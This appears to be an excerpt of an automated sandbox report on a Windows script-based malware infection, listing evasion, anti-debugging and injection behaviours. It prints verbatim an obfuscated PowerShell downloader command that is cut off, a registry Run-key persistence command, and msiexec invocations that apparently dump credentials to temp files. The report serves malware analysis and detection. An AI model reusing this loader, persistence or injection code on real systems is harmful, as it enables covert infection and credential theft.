                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Initial fileInitial file: Do While Tongueful.Status = 0 WScript.Sleep 100
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,18_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6869Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2987Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5779Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4030Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 9.0 %
                Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
                Source: C:\Windows\System32\wscript.exe TID: 2232Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6940Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5684Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 3280Thread sleep count: 213 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 3280Thread sleep time: -106500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep count: 789 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -2367000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep count: 8749 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -26247000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232D10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_232D10F1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232D6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,11_2_232D6580
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040AE51 FindFirstFileW,FindNextFileW,18_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00418981 memset,GetSystemInfo,18_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: wscript.exe, 00000000.00000002.1528311939.0000024A7C71C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}-
                Source: wscript.exe, 00000000.00000002.1528311939.0000024A7C71C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\0c91efq
                Source: wscript.exe, 00000000.00000002.1528311939.0000024A7C71C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: powershell.exe, 00000004.00000002.1678118625.00000196B079D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$K%SystemRoot%\system32\mswsock.dllizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castra
                Source: wscript.exe, 00000000.00000003.1510571851.0000024A7E670000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1509895283.0000024A7E670000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1528673980.0000024A7E670000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1522996795.0000024A7E670000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000000.00000003.1510495746.0000024A7C73D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1522403444.0000024A7C75E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1528449823.0000024A7C75E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1510411398.0000024A7C715000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`Rg~J
                Source: PING.EXE, 00000002.00000002.1517459878.0000021B95A19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt
                Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_19-34015
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0087DAAC LdrInitializeThunk,LdrInitializeThunk,6_2_0087DAAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232D2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_232D2639
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,18_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,18_2_004044A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232D4AB4 mov eax, dword ptr fs:[00000030h]11_2_232D4AB4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232D724E GetProcessHeap,11_2_232D724E
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232D2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_232D2B1C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232D2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_232D2639
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232D60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_232D60E2

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Source: Yara matchFile source: amsi64_5976.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5976, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5308, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3E70000Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677eJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk caJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hywcyvebel"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hywcyvebel"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kscvygpustapv"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uuhnryzwobsuytie"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#unappropriation smaamnterne slaaenbrrene forsgsarbejders heiau #>;$gaardvagters='skvalderkaal';<#elicits tppes istandsttelses slavicist phylarch #>;$unhypnotizables=$urocentrumet204+$host.ui; function nrigstes($epiphanizingsochronized70){if ($unhypnotizables) {$kwanza++;}$dapifer=$leishmanic+$epiphanizingsochronized70.'length'-$kwanza; for( $epiphanizing=4;$epiphanizing -lt $dapifer;$epiphanizing+=5){$crawlerize=$epiphanizing;$castrato+=$epiphanizingsochronized70[$epiphanizing];$epiphanizingndianize='fljtekedels';}$castrato;}function depending($pyotr){ & ($tudsefisks33) ($pyotr);}$stvknappen=nrigstes 'was mant.odekazretrisubclm.tiltetrahvii/ ran ';$stvknappen+=nrigstes ' nd,5fi,m. um0kile mi n(overwsk,minympn ashd fedoforfwfo.ssuna cr mnan ithand tild1hith0sard.bela0u tr;sene brugwbut iblo nare 6tred4fo.l; fir nedsxphre6,nde4 un,;udfo salmr j nvspu : ini1i co3 end1jagt.llen0 rep)revi yntgd wnemillcansgkaviao fly/ agn2 ud 0hand1rici0spr,0dagb1 f s0 uds1la.d trof jacihjtirnedgeopstftarvop.eixjoke/ ag 1cl i3 kl,1futh.rigs0kin. ';$rrfabrikkernes=nrigstes 'denaus ans unmeoprer oeb-forlatr,og uvie ov npyretorys ';$hucksterage=nrigstes ' smrhkaertbonut filpkomms ab:feld/be y/natat bibothyrttanto l fpindrlh.ana arussyvatpean. u ecudvaos rem p o/un.rrmedf5 arb/ar,tc suroinfrsprygtnonailgnafang,omi lrlukkmf rp.spe oarchc antx tel ';$oxeye=nrigstes ' omd>bund ';$tudsefisks33=nrigstes ' abri preerivaxkon ';$tilplantet='deutonephron';$uncaps='\cobblerism.ace';depending (nrigstes 'anat$ progs,efl belo mazb ,nwauns lobje: axiv nnesvumr tabdchinsdebal,dlaifanfgafghsaf,ei kopnsa,udpeleec urtte k=anth$unpiesolsn smuvbipi:undeapreapbo.sp .midufora intt pola phr+ bot$ offunonvnblacc kolas appma ps ni ');depending (nrigstes ',ump$ u pgbemyldepoo turbprosaforelkas : pinl canimummmvandinut tdag 